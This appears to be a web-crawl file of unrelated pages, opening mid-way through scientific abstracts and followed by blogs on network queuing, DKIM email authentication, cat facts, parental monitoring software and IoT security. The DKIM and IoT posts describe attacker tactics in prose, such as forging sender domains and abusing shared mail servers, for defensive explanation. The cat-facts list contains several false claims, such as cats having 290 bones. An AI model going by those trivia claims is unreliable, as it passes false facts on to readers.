intensification of the microbial loop, while NPP in the remaining model changes by less than 0.5 %. While models consistently project increases NPP in the Southern Ocean, the regional inter-model range is also very substantial. In most models, this increase in NPP is driven by temperature, but it is also modulated by changes in light, macronutrients and iron as well as grazing. Overall, current projections of future changes in global marine NPP are subject to large uncertainties and necessitate a dedicated and sustained effort to improve the models and the concepts and data that guide their development. © 2015 Author(s). Source
Beekmann M.,University Paris Est Creteil |
Baltensperger U.,Paul Scherrer Institute |
Borbon A.,University Paris Est Creteil |
Sciare J.,French Climate and Environment Sciences Laboratory |
And 110 more authors.
HARMO 2010 - Proceedings of the 13th International Conference on Harmonisation within Atmospheric Dispersion Modelling for Regulatory Purposes | Year: 2010
Within the FP7 MEGAPOLI project, two intensive field campaigns have been conducted in the Greater Paris region during July 2009 and January/February 2010. The major aim was to quantify sources of primary and secondary aerosol, and the interaction with gaseous precursors, in and around a large agglomeration in temperate latitudes. From this campaign, a comprehensive data set will be built which will be available for urban and regional scale air quality model evaluation. The paper will present campaign objectives and set-up, first results, and specific benchmarks, which should be most useful for model evaluation. Source
Wattrelot E.,Center National Of Recherche Meteorologique |
Caumont O.,Center National Of Recherche Meteorologique |
Mahfouf J.-F.,Center National Of Recherche Meteorologique
Monthly Weather Review | Year: 2014
This paper presents results from radar reflectivity data assimilation experiments with the nonhydrostatic limited-area model Application of Research to Operations at Mesoscale (AROME) in an operational context. A one-dimensional (1D) Bayesian retrieval of relative humidity profiles followed by a three-dimensional variational data assimilation (3D-Var) technique is adopted. Several preprocessing procedures of raw reflectivity data are presented and the use of the nonrainy signal in the assimilation is widely discussed and illustrated. This two-step methodology allows the authors to build up a screening procedure that takes into account the evaluation of the results from the 1D Bayesian retrieval. In particular, the 1D retrieval is checked by comparing a pseudoanalyzed reflectivity to the observed reflectivity. Additionally, a physical consistency between the reflectivity innovations and the 1D relative humidity increments is imposed before assimilating relative humidity pseudo-observations with other observations. This allows the authors to counteract the difficulty of the current 3D-Var system to correct strong differences between model and observed clouds from the crude specification of background-error covariances. Assimilation experiments of radar reflectivity data in a preoperational configuration are first performed over a 1-month period. Positive impacts on short-term precipitation forecast scores are systematically found. The evaluation shows improvements on the analysis and also on objective conventional forecast scores, in particular for the model wind field up to 12 h. A case study for a specific precipitating system demonstrates the capacity of the method for improving significantly short-term forecasts of organized convection. © 2014 American Meteorological Society. Source | <urn:uuid:82a63169-c36d-4a76-ba7e-08c10d44b65c> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/center-national-of-recherche-meteorologique-1487803/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00396-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.904134 | 1,834 | 3.015625 | 3 |
In part 8 of this series we are going to unravel the mysteries of congestion management and its four main queuing methods.
Congestion is the result of many factors and can occur in many places on the network. A few of the reasons for congestion are traffic aggregation points, network transit points, speed mismatches, oversubscription, and insufficient packet buffers. Aggressive traffic can fill interface queues and starve more time sensitive flows such as voice and video. Increasing bandwidth is not an adequate fix to solve these issues. By using queuing algorithms to sort traffic and determine a method of prioritizing traffic, the routers can solve specific network traffic issues which in turn can increase network performance.
There are two hardware components; hardware and software. Hardware queuing always uses FIFO queueing, and software queueing is used if the hardware queue is full. A full hardware queue indicates interface congestion and a software queue is used to manage that congestion.
To control congestion, the device using the congestion management tools must determine the buffer queues the packets are to be queued in and what order in which packets are sent out an interface based on the priority assigned to those packets. Congestion management tools must perform these tasks to function as suggested.
- Create Queues
- Assign packets to queues based on the packet classification
- Schedule the packets for transmission
There are four types of queuing mechanisms in the congestion management feature set. Each mechanism is fully customizable to specify different number of queues and the order in which the traffic is serviced. Only one queueing mechanism type is allowed to be configured on each interface.
In times of no congestion, packets are sent out the interface as soon as they arrive. During times of congestion when packets are arriving faster than the interface can send them, the congestion management tools queue the packets in buffers based on their classification and are scheduled based on the algorithm of that particular queuing method. The router determines the order of packet transmission by controlling which packets are placed in which queue and how queues are serviced with respect to each other.
Following are the four types of queueing, which constitute the congestion management QoS features. The queueing types are listed here and will be fully discussed in the next few entries of this blog series.
- FIFO (first-in, first-out) entails no concept of priority or classes of traffic. With FIFO, transmission of packets out the interface occurs in the order the packets arrive.
- Custom queueing (CQ) allocates bandwidth proportionally for each different class of traffic. CQ allows for the specification of the number of bytes or packets to be drawn from the queue. This is especially useful on slow interfaces.
- Priority queueing (PQ) sends packets belonging to one priority class of traffic before all lower priority traffic to ensure timely delivery of those packets.
- Weighted fair queueing (WFQ) offers dynamic, fair queueing that divides bandwidth across queues of traffic based on weights. WFQ ensures that all traffic is treated fairly, given its weight.
To understand how WFQ works, consider the queue for a series of File Transfer Protocol (FTP) packets as a queue for the collective and the queue for discrete interactive traffic packets as a queue for the individual. Given the weight of the queues, WFQ ensures that for all FTP packets sent as a collective an equal number of individual interactive traffic packets are sent.
Given this handling, WFQ ensures satisfactory response time to critical applications, such as interactive, transaction-based applications that are intolerant of performance degradation.
There are four types of WFQ:
- Flow-based WFQ (WFQ)
- Distributed WFQ (DWFQ)
- Class-based WFQ (CBWFQ)
- Distributed class-based WFQ (DCBWFQ)
For serial interfaces at E1 (2.048 Mbps) and below, flow-based WFQ is used by default. When no other queueing strategies are configured, all other interfaces use FIFO by default.
Author: Paul Stryer
- Cisco IOS Quality of Service Solutions Configuration Guide, Release 12.4T
- End-To-End QoS network Design, by Tim Szigeti and Christina Hattingh – ISBN # 1-58705-176-1
- DiffServ – The Scalable End-To-End QoS Model
- Integrated Services Architecture
- Definition of the Differentiated Services Field
- An Architecture for Differentiated Services
- Requirements for IP Version 4 Routers
- An Expedited Forwarding PHB (Per-Hop Behavior) | <urn:uuid:97f8988a-73bf-42d1-a053-880a6e0e17fc> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2010/01/22/qos-part-8-congestion-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00516-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.914474 | 961 | 3.40625 | 3 |
Stopping Forged Email 2: DKIM to the Rescue
We have recently looked at how hackers and spammers can send forged email and then seen how these forged messages can be almost identical to legitimate messages from the purported senders. In fact, we learned that generally all you can trust in an inbound email message is the internet IP address of the server talking to your inbound email server — as this cannot realistically be forged in any way that would still enable you to receive the message.
In our last post in this series, we examined how SPF can be used to help weed out forged email messages based on validating if a message was sent by an approved server by looking at the IP address delivering the email message to you. We found that while SPF can work, it has many significant limitations that cause it to fall far short of being a panacea.
So — besides looking at the sending server IP address — what else can we do to determine of a message was forged?
It turns out that there is another way — through the use of encryption techniques and digital signatures — to have the sender’s servers transparently “sign” a message in a way that you can verify upon receipt. This is called DKIM.
DKIM – Domain Keys Identified Mail: A Simple Explanation
DKIM stands for “Domain Keys Identified Mail” … or, re-writing this more verbosely, “Domain-wide validation Mail Identity through use of cryptographic Keys”. To understand DKIM, we need to back up for a second and look at what we mean by “cryptographic keys” and how that can be used.
In security, there is a concept called symmetric encryption that everyone is familiar with: you pick a password and use some “cipher” to convert a regular (plaintext) message into an encrypted (ciphertext) message. Someone else who knows the password and cipher can reverse the process to get the regular message back.
Another extremely common (e.g. it is the basis for SSL, TLS, S/MIME, PGP and other security technologies), but more complex method is asymmetric encryption. In asymmetric encryption, one can create a “key pair” … a combination of a 2 keys. A message encrypted using Key 1 can only be decrypted with Key 2 and vice versa. We typically call Key 1 our “private key” because we keep that safe and secret. We are happy to publish “Key 2” to the world.
What does that buy you?
- Signatures: Anything that you encrypt using Key 1 can be decrypted by anyone. But if they can decrypt it, that proves that you sent it (as only you have your secret key and thus “only you” could have encrypted it).
- Encryption: Anyone can use your public key to encrypt a message that can only be opened by you (using your secret key).
DKIM uses the cool feature asymmetric encryption for signing messages. Here is how it works (a hand waving overview that leaves out many details for the sake of clarity):
- Make a Key Pair: The folks in charge of the sender’s servers create a cryptographic key pair
- Publish the Public Key: These same folks publish the public key in the DNS for their domain
- Sign Messages: Using the private key, the sender’s servers look at selected message headers (e.g. the sender name and address, the subject, the message ID) and the message body, they use a cryptographic “hash” function to make a unique “fingerprint” of this info (e.g. so that any change to that info would change the fingerprint). This fingerprint hash is encrypted using the private key and this “fingerprint” as added to the message as a new header called “DKIM-Signature”.
Now, when you receive a message that is signed using DKIM, you know the purported sender, the IP address the message came from and you have this additional “DKIM-Signature.” However, you cannot trust that this signature header is real or has not been tampered with. Fortunately, you do not have to trust it blindly; DKIM allows you to verify it. Here is what happens on the recipient’s side:
- Receipt: The recipient’s inbound email server receives the message
- Get the Signature: The encrypted DKIM fingerprint is detected and extracted from the message headers
- Get the Key: The sender’s purported domain is known; the recipients server looks in DNS to get the sender domain’s public DKIM encryption key
- Decryption: The fingerprint is decrypted using the public key.
- Fingerprint Check: The recipient then uses the message body and the same headers as the sender to make another fingerprint. If the fingerprints match … then the message has not been altered since it was sent.
So, this buys you sender identity verification by:
- We know that the message was not modified since it was sent — so the name and the address of the sender (among other things) is the same as it was when it was sent.
- We know that the message was sent by a server authorized for sending email for the sender’s domain — as that server used the DKIM private key for that domain.
So, through encryption, we have a way to verify that the message was sent by a server authorized to send email fro the sender’s domain … and thus we have a “solid” reason to believe the sender’s identity. Furthermore, this validation does not rely on server IP addresses at all, and thus does not share the weaknesses of SPF.
Setting up DKIM
With DKIM (as with all anti-fraud solutions for email), it is up to the owner of a domain (e.g. the owner of bankofamerica.com) to setup the DNS settings required for DKIM to be checked by the recipients. If they do not do this, then there is no way to verify DKIM and any DKIM signatures on messages will be ignored.
DKIM is set up by adding special entries to the published DNS settings for the domain. You can use a tool, such as this DKIM Generator, to create create your DKIM cryptographic keys and tell you what you should enter in to DNS. Your email provider may have their own tools that assist with this process — as the private key needs to be installed on their mail servers and use of DKIM has to be enabled; we recommend asking your email provider for assistance.
We are not going to spend time on the details of the configuration or setup here; instead we will look at the actual utility of DKIM and where it falls on its face and how attackers can get around it.
DKIM – The Good Parts
Once DKIM has been set up and is used by your sending mail servers, it does an amazing job with anti-fraud…. generally much better than SPF. It also helps ensure that messages have not been modified at all since they were sent … so we can be sure of who sent the message and of what they said; SPF does not provide any kind of assurance that messages were not modified.
Use of DKIM is highly recommended for every domain owner and for every email filtering system.
However, as we shall see next, its not time to throw a party celebrating the end of fraudulent email.
DKIM – Its Limitations
Domain Keys Identified Mail has sone significant limitations in the battle against fraud:
It can be hard to identify and set up all authorized servers
For proper use of DKIM, all servers that send email for your domain must be able to use DKIM and have keys for your domain. This can be difficult if you have vendors or partners that send email for you using your domain or if you otherwise can not be sure that all messages sent will be signed.. In such cases, if you cannot get them to use DKIM, you should have them send email for you using a different domain or a subdomain, so that your main domain can be fully DKIM-enabled and its DNS can tell everyone that DKIM signatures must be present on all messages. E.g. you want to be “strict” with DKIM usage in a way that is hard to do with SPF.
If you cannot be strict, then DKIM allows you to be soft … indicating that signatures may or may not be present. In such cases (like with SPF), the absence of a DKIM signature does not make a message invalid; the presence of a valid signature just makes the message certainly valid. If your DKIM setup is “soft”, forgery is simple.
DKIM checks only the domain name and the server.
If there are two different people in the same organization, Fred@domain.com and Jane@domain.com — either of them can send email legitimately from their @domain.com address using the servers they are authorized to use for domain.com email.
However, if Fred@domain.com uses his account to send a message forged to be from Jane@domain.com — DKIM will check out as “OK” … even if DKIM is set as strict.
DKIM does not protect against inter-domain forgery at all.
Note: using separate DKIM selectors and keys for each unique sender would resolve this problem (and the next one); but this is rarely done.
Same Email Provider: Shared Servers Forgery?
This is a generalization to inter-domain forgery. If Fred@badguy.com and Jane@goodguy.com were using the same email service provider and the same servers, Jane’s goodguy.com domain is setup with DKIM, and the email provider’s servers are also setup to sign messages from @goodguy.com with appropriate DKIM signatures, what happens when Feed@badguy.com logs in to his account and sends a message pretending to be from Jane?
The answer depends on the email provider!
- The provider could prevent Fred from sending email purporting to be from anyone except himself. This would solve the problem right away but is very restrictive and many providers do not do this.
- The provider could associate DKIM keys to specific users or accounts (this is what LuxSci does) … so Fred’s messages would never be signed by valid the “goodguy.com” DKIM keys, no matter what. This also solves the problem.
However, if the provider’s servers are not restrictive in one of these (or a similar way), then Fred’s forged email messages will be DKIM-signed with the goodguy.com signature and will look DKIM-valid.
Legitimate Message Modification
DKIM is very sensitive to message modification; DKIM signature checks will come back “invalid” if even 1 character has been changed. This is generally good, but it is possible that some filtering systems read and “re-write” messages in transit where the “real” message content is unchanged but certain (MIME) “metadata” is replaced with new data (e.g. the unique strings that separate message parts). This breaks DKIM and it can happen more frequently that you might expect.
Good spam filters check DKIM before modifying messages; but if you have multiple filtering systems scanning messages, then the DKIM checks of later filters may be broken by the actions of earlier filters.
DKIM does not really protect against Spam
This is not a limitation of DKIM, but worth noting anyway. All DKIM does is help you identify if a message is forged or not (and if it has been altered or not). Most Spammers are savvy. They use their own legitimate domain names and create valid DKIM (and DPF and DMARC) records so that their email messages look more legitimate.
In truth this does not make them look less spammy; it just says that the messages are not forged.
Of course, if the spammer is trying to get by your filters by forging the sender address so that the sender is “you” or someone you know, then DKIM can absolutely help.
For further DKIM issues and misconceptions, see: 7 common misconceptions about DKIM in the fight against Spam.
How Attackers Subvert DKIM
So, in the war of escalation where an attacker is trying to get a forged email message into your INBOX, what tricks do they use to get around sender identity validation by DKIM?
The protections afforded by DKIM are more significant than those provided by SPF. From an attacker’s perspective, it all comes down to what sender email address (and domain) they are forging. Can they pick an address to construct an email that you will trust that will make it past DKIM?
- If the sender address does not support DKIM at all — the attacker is “all set”.
- If your DKIM is set up as “weak“, then the attacker can send a forged message with a missing DKIM signature and it will look legitimate.
- If the attacker can send you a message from one of the servers authorized by the DKIM for the domain and if that server does not care who initiated the message … but will sign any messages going through it with the proper DKIM keys, then the message will look legitimate. E.g. If the attacker signs up with the same email provider as that used by the forged domain and that provider’s servers do not restrict DKIM key usage, then s/he can send an email from those same servers are the legitimate account and have his/her messages properly signed. This makes the attacker’s email look “Good” even if the forged domain’s DKIM records are “strict”.
An attackers options are much more limited with DKIM. S/he can only send fraudulent messages from domains with no or weak DKIM support, or send through non-restrictive shared email servers, or steal the private key used by the sender’s DKIM, or s/he must actually compromise the email account of someone using the same email domain as address that is to be faked.
The situation is better, but not perfect … especially as many organizations leave their DKIM configuration as “weak” as they would rather take a chance on forged email rather than have legitimate messages be missed or discarded due to inadvertent message modification or because they were sent from a server without DKIM.
We will see in our next post how one can use DMARC to combine the best features of DKIM and SPF to further enhance forged email detection…. and where the gaps that attackers use still remain. | <urn:uuid:d4836f37-9b44-499f-becb-e3ae0940547d> | CC-MAIN-2017-04 | https://luxsci.com/blog/stopping-forged-email-2-dkim-rescue.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00424-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92845 | 3,097 | 2.59375 | 3 |
Amazing Facts About Cats - 25 Interesting Facts About Cats
Here is a collection of amazing facts about cats.
Amazing Facts About Cats
- The nose pad of a cat is ridged in a pattern that is unique, just like the fingerprint of a human.
- Cats have 290 bones and 517 muscles in their body.
- Cats are born with blue eyes. They change at approximately 12 weeks of age.
- During her productive life, one female cat could have more than 100 kittens.
- The biggest breed of domesticated cats are called a Maine Coon cat and weighs up to 11 kg.
- Purring doesn't necessarily mean a cat is happy. Sometimes cats will purr when they are scared or hurt.
- A cat's IQ is only surpassed by that of monkeys and chimps in the world of animals.
- Cat's sense of smell is 14 times stronger than ours. This means they can smell the odour in the litter box much earlier than us.
- Cats have 30 permanent teeth, while adult humans have 32.
- Killing a cat was punishable by death in acient Egypt.
- There are more than 500 million domestic cats in the world, with 33 different breeds.
- The average age for an indoor cat is 15 years, while the average age for an outdoor cat is only 3 to 5 years.
- A cat uses it's whiskers to tell if the space they are contemplating entering is big enough for them.
- Cat urine glows in the dark if a black light is shined on it. This is a good way to detect cat urine in your home.
- A cat's hearing is much stronger and more sensitive than a dog's or a human's. Our hearing stops at 20 khz; a cat's at 65 khz.
- Cats often have a third eyelid that is not normally visible to us. If you are seeing it more often – the cat may be.
- A cat's heart beats twice as fast as a human heart, at 110 to 140 beats per minute.
- Cats are partially color blind. They have the equivalency of human red/green color blindness. (Reds appear green and greens appear red; or shades thereof.)
- Cats don't see detail very well. The person may appear hazy when standing in front of them.
- Cats can jump between 5 & 7 times as high as their tail.
- Only about 80% of cats have the gene that allows them to respond to the effects of catnip. The other 20% are not affected by it.
- Your cat loves you and can read your moods. If you're sad or under stress, you may also notice a difference in your cat's behavior.
- Cats are the sleepiest of all mammals. They spend 16 hours of each day sleeping. With that in mind, a seven year old cat has only been awake for two years of its life!
- Sometimes your cat will find it difficult to find the treats you throw him on the floor. The reason is because cats can't see directly under their own nose.
- A cat will almost never meow at another cat. This sound is reserved for humans.
This list is based on the content of the title and/or content of the article displayed above which makes them more relevant and more likely to be of interest to you.
We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do not use keywords in the name field. Let's have a personal and meaningful conversation.comments powered by Disqus | <urn:uuid:dd6fbaf0-553a-4a83-b0d0-357c79aff51c> | CC-MAIN-2017-04 | http://www.knowledgepublisher.com/article-976.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00058-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957633 | 752 | 3.265625 | 3 |
Internet Safety For Kids: How to Monitor Your Kids Online Activities
Imagine that you have a 14-year-old daughter. Perhaps you do, in fact. Do you know what she is doing online? Is there a possibility that she is corresponding with someone she shouldn’t be? Do you think you are watching the internet habits of your child(ren) closely enough?
A recent survey has found that almost 70 percent of teens report that they know how to hide what they do online, and about 80 percent of parents don’t know how to find out what their kids are doing.
This is absolutely frightening.
Some believe that monitoring their children’s online activities is spying, but this is actually called “parenting” and should be a key piece of your internet safety strategy for keeping your kids safe. Instead of looking at the internet as a right, parents should be looking at it as a privilege. There are too many bad guys out there preying on children and teens, and as a parent, you must take an active role in stopping this. Here are a few internet safety tips to help you protect your kids.
- Spend time with your kids online; learn about their habits and who they are interacting with.
- Put your computer in a high-traffic area of the home and set a time limit. If a child has their own laptop, only allow them to use it in certain areas of the home.
- Teach children to recognize online behavior that is inappropriate.
- Invest in software that allows you to control the sites your child visits.
- Remind children to create only appropriate usernames, photographs, and to never reveal personal information to those online.
- Make sure your child understands that you will be checking their devices for offending behavior without warning – and make sure you actually check them.
Software to Help You Monitor Your Children
As mentioned, it is a good idea to use software to monitor what your children are doing online. Here are some of the best:
- Limitly – This software allows you to limit screen time and app use on their mobile device. It is free, but only available for Android.
- Trackidz – This software allows you to track which apps your kids are downloading, manage their time on mobile devices, and track location. The software alerts you when your child turns off their phone, and you can view your child’s contacts.
- Pocket Guardian – With this software, you will get an alert when bullying, sexting, or inappropriate images are detected on your child’s mobile device.
- VISR – To use VISR, you must have access to your child’s usernames and passwords. The software then analyzes emails and social media accounts for suspect behavior such as profanity, bullying, nudity, or even late night use.
- Bark – Like VISR, you must have access to usernames and passwords. It analyzes activity and alerts you when there is a problem.
Things are much different now than when many of us were young, and even very different from when the internet became a household utility. I’m the security expert that the 6 o’clock news keeps calling to speak to about the recurring story that involves an online predator taking advantage of young girls. Protect your kids today, tomorrow and for as long as they are under your immediate care.
Latest posts by Robert Siciliano (see all)
- Increase Email Security and Reduce Your Risk of Being Hacked - January 17, 2017
- Technology and Kids: How to Manage Your Child’s Tech Time - January 10, 2017
- Privacy Tip: Remove EXIF Data From Photos - January 3, 2017
- January 2017
- December 2016
- November 2016
- October 2016
- September 2016
- August 2016
- July 2016
- June 2016
- May 2016
- April 2016
- March 2016
- February 2016
- January 2016
- December 2015
- November 2015
- October 2015
- September 2015
- August 2015
- July 2015
- June 2015
- May 2015
- April 2015
- March 2015
- February 2015
- January 2015
- December 2014
- November 2014
- October 2014
- September 2014
- August 2014
- July 2014
- June 2014
- May 2014
- April 2014
- March 2014
- February 2014
- January 2014
- December 2013
- November 2013
- October 2013
- September 2013
- August 2013 | <urn:uuid:1a7af330-4f74-4ad2-9cef-5ffb47e715fa> | CC-MAIN-2017-04 | https://www.identityforce.com/blog/internet-safety-kids-monitor-kids-online-activities | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00452-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9616 | 934 | 2.8125 | 3 |
Written in collaboration with Yunhui Long.
In this time and age, where companies brew money using user data, consumer privacy is at stake. Incessant identity thefts and phishing attacks, and revelations about mass government surveillance have resulted in privacy paranoia among consumers. Consumers have thus come to prefer products and services with stronger privacy postures. To this end, two major privacy technologies have gained immense attention -- End-to-end Encryption and Differential Privacy. While both the technologies strive to protect user privacy, interestingly, when put together, the whole is smaller than the sum of its parts.
Firstly, what exactly are end-to-end encryption and differential privacy?
What is End-to-end Encryption?
End-to-end encryption (E2EE) is a popular privacy technology for instant-messaging services. With this technology, only the communicating users can read the messages. Technically speaking, this works by encoding the sender’s message in such a way that only the receiver has the key to decode it.
Just in the past three years, various messaging apps have implemented end-to-end encryption. Notably, this shield not only protects users from external eavesdroppers, but also ensures that even the company offering the instant-messaging service cannot access the data.
What is Differential Privacy?
Intuitively, differential privacy is a technique that can reveal interesting patterns in a large dataset, while still protecting privacy of individual data entries.
To understand the technique, consider a database of salaries of all Software Engineers in the Silicon Valley. Let us say that an analyst is allowed to access the average of the salaries. Denote the average value by avg1. Let us say that a new item v is added to the database; let the new average be avg2. The analyst can easily decode what v is, just by knowing avg1 and avg2. [v = avg2 * (N+1) – avg1 * N], where N is the total number of salaries in the original database.
Differential privacy avoids such scenarios. More specifically, differential privacy is a statistical learning tool that works by adding carefully computed mathematical noise to the statistical aggregate. In the above example, the noise term added to the average salary does not allow the analyst to learn information about the exact salary of any individual software engineer. The noise term is large enough to mask individual data items, but small enough to allow any patterns in the dataset to appear.
Differential Privacy to Protect User Privacy
Until recently, differential privacy had been a topic of theoretical research without much application in real-world scenarios. Clearly, differential privacy can bring a significant value to the table: In the today’s consumer-driven economy, it’s crucial for businesses to learn and adapt to consumer behavior. Thus, collecting and studying patterns in consumer data has become key ingredient for success survival. The ability to extract patterns from large datasets, while still protecting privacy of individual data points seems to be a boon.
An application of differential privacy: Consider a company C providing an end-to-end encrypted instant-messaging service. A desirable feature of an instant-messaging service is smart autocomplete. To provide this feature, all the data that C needs is just the English dictionary. Now, consider a smart autocomplete feature that also suggests trending slangs even before you have heard of those slangs. Note that the suggestions are specifically based on a population’s messaging behavior. So, clearly, this feature needs consumer data. In such a case, differential privacy might be used to collect and process consumer data, while still preserving individual privacy.
Methodologies for implementing differential privacy: Unfortunately, differential privacy had been confined only to theoretical research, and there isn’t much work on how to employ this in practice. Thus, the exact methodologies of implementing this technology large scale is unclear. A specific interesting question is what exact methodology one should use to sample the noise terms. There are two major methodologies in the literature:
- A prevalent methodology is to first collect the exact data points, compute an aggregate (such as, total count or average) of the collected data points, and then add noise to the aggregate. This necessitates the users sending their exact information to the company C. Thus, while this methodology protects user privacy from the public, the company still gets access to the exact user information. This is undesirable.
- Thankfully, there is another methodology which, although less prevalent, seems to fit the bill: It involves adding noise to the data points at the user end before the data is collected and sent to C’s cloud storage. Then C would aggregate the noised data points. This helps preserve some privacy from C too. A significant research in this area came from Google Research --RAPPOR methodology, and it involves the so-called tools of ‘hashing’ and ‘sub-sampling’.
However, the devil is in the details.
The Devil in the Details
Detail 1: RAPPOR-like techniques would require C to know a set of candidate strings of which C is computing the usage frequency. For concreteness, in the case of trending slangs, C would actually need to know the slangs, that the users are sending through the messaging service, to determine the frequency.
Detail 2: Recall that the conversations are end-to-end encrypted. Also recall that the objective of end-to-end encryption is to have no door through which C can obtain user data (so that C may not be coerced to reveal user data even by government surveillance warrants).
The devil: Detail 1 implied that C needs to look into user data, Detail 2 recalled that the data is already encrypted. In other words, to learn the candidate strings used in differential privacy techniques, the company may need to see the unencrypted content of individuals' conversations, which is against the very intention of end-to-end encryption.
This shows that the two privacy technologies fundamentally tussle with each other. In fact, we have seen that one can seriously backpedal the other. Thus, any methodology that will make these privacy technologies work together will be incredibly non-trivial and ground-breaking.
In summary, although end-to-end encryption and differential privacy offer strong user privacy protection, these two technologies interact in interesting ways, one fundamentally backpedaling the effect of the other. In this light, while differential privacy is a promising tool, implementing and deploying it while retaining the privacy of end-to-end encryption is challenging. | <urn:uuid:d22d3a66-8257-4e94-b667-1b3f16f6ebf9> | CC-MAIN-2017-04 | http://infosecisland.com/blogview/24830-Differential-Privacy-vs-End-to-end-Encryption--Its-Privacy-vs-Privacy.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00268-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.932499 | 1,351 | 3.125 | 3 |
The Internet of Things is on the cusp of making our lives easier as consumers and business professionals, but are these devices also making us more likely to be targeted by hackers?
Information security is a huge topic of conversation right now, and it’s about to get even bigger. Edward Snowden’s leaks on government surveillance and huge data breaches at Target, JPMorgan, TalkTalk and others made the subject front-page news, and that is likely to continue given the proliferation of the Internet of Things (IoT).
IoT devices, forecast to grow to 50 billion units by 2020, offer consumers and businesses huge amounts of convenience and benefit, but to hackers too they are also a goldmine. This is because such devices represent another piece of hardware or software that can be compromised – and ultimately lead to stolen data or money.
The early signs of IoT security are not encouraging; researchers have already managed to hack everything from Google’s Nest to an internet-connected doll and Canon printer, while significant and exploitable software vulnerabilities have also been found in Wi-Fi light bulbs, smartwatches and Internet-connected baby monitors. There have been questions too on how this affects businesses, if the likes of Nest and Hive are connecting to enterprise Wi-Fi networks.
Security experts have been quick to voice their fears over IoT, with many pointing the finger at device manufacturers.
A recent study of 7,000 IT professionals by cyber-security association ISACA found that 75 percent thought IoT device manufacturers were not implementing sufficient security measures devices, while a further 73 per cent said existing security standards were inadequate.
Speaking to Internet of Business shortly after these results were published, BH Consulting managing director Brian Honan joined the chorus of discontent.
“IoT makes our lives easier and better in many regards, but unfortunately you also have to take into account that, in the rush to get these devices to market, [manufacturers] forget about security.
“We’re seeing IoT devices, from kettles and light bulbs to a range of different products, that are insecure out-of-the-box; they have weak security, default passwords…and can allow people with malicious intent to control those devices for their own needs.
“We also have issue on privacy as lot of these devices can take a lot of information, which is being used by companies to improve services. But if that information falls into wrong hands, that will impact on privacy.”
Ken Munro is CEO and founder of penetration testing outfit PenTest Partners, which has found numerous IoT device vulnerabilities over the last year, and he agrees with Honan that security must be baked-in to products from the start, especially given the fast acceleration of IoT devices.
“The reason I love IoT as a security researcher is that there’s enormous attack surface,” Munro told IoB, adding that attackers can leverage everything from device and mobile application flaws to API and server infrastructure vulnerabilities in order to attack IoT users.
He said that rolling such devices out across staff and customers is simply accentuating that risk.
“Everyone has got access to everything with IoT, and this means that you need firmware, OS, mobile app and coding experts…You need to know how to put apps together with wireless or GSM technology. There’s a massive expansion skillset required in order to adopt IoT.”
“We’re seeing crazy acceleration of IoT devices available, primarily because there’s money to be made, but I think we’re going to see standards starting to become available”. Munro is working on standards at the IoT Security Foundation, and says GSMA are working on something similar for mobile communications.
Munro adds vendors are too often focused on getting goods to market rather than if the device is secure. Some, he says, simply hope to patch the OTA or ‘hope the problems go away’.
Munro, who praised Fitbit for bolstering its own security team at the start of the year, says that IoT flaws, which usually reside in app source code or resolve around weak passwords and unsecured Wi-Fi, can enable attackers to take control of devices locally or remotely. The latter could ultimately lead to larger-scale attacks, such as turning off heating or surveilling a property to see when it not occupied.
Other experts, meanwhile, have cited patch management as a major issue given billions of IoT devices forecast to ship, and say that more elaborate IoT attacks could lead to driverless cars becoming mobile bombs, or connected devices sending malware via botnets or through spam emails.
But benefits outweigh the negatives
Shipping company Maersk reportedly has one of the largest deployments of industrial IoT, using IoT to ensure refrigerated containers all maintain the correct temperature.
Speaking at a recent conference, UK CIO Andy Jones outlined the benefits of the deployment, saying that the firm is now able to monitor goods in real-time via IP-enabled sensors, whereas it previously took engineers two days to check and report on these conditions.
The readings from these sensors are continually fed into Maersk’s monitoring systems via satellite, and any problems at sea can be identified immediately.
Jones says the problem arises where IoT systems are connected to something physical, like braking or airbag systems of vehicles or the heating and cooling systems of buildings. The security challenges are many, not only because of the difficulty in keeping devices and software patched, but also because the internet protocol (IP) used by IoT devices is inherently insecure.
“Combine this with the fact the internet does not have any form of service level agreement, that there are millions of devices in the hands of unsophisticated users, and that the internet is accessible worldwide, and you have the perfect storm,” he said.
Alan Woodward, computing professor at the University of Surrey, added in an interview with IoB: “My big concern from a security perspective…is that IoT is set up using embedded computing, which is notorious for cheap, open-source, off the shelf bits of software and hardware.”
He has concerns over cheap devices and weak patch management, saying on the latter that updating the firmware on embedded IoT systems is ‘extremely difficult’ and ‘problematic’.
“I think IoT has far more potential than ever mainstream computing for being compromised. The Internet of Things is classic area where people are having to relearn all lesson taken 25 years to learn in computing.”
What businesses can do
Munro urges CIOs and other IoT decision makers to be proactive in auditing and managing devices, even it means ‘walking the floors’ to find out what devices are connecting to enterprise networks.
The CIO, he says, must think “really seriously” what data could be compromised if system breach, what hackers access to, and if segregated [on the network]. carry out risk assessment.
Jones is optimistic of the future, but advises isolating IoT devices on risk. “Any risk assessment should include the criminal mindset and learn from past analogies,” he said. Woodward urges for companies to roll-out IoT policies of use, so users clearly know their data can be wiped and devices managed. | <urn:uuid:b9a835f0-5e94-4f05-956f-fd70403f71d6> | CC-MAIN-2017-04 | https://internetofbusiness.com/how-secure-is-the-internet-of-things/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00176-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.954207 | 1,504 | 2.515625 | 3 |
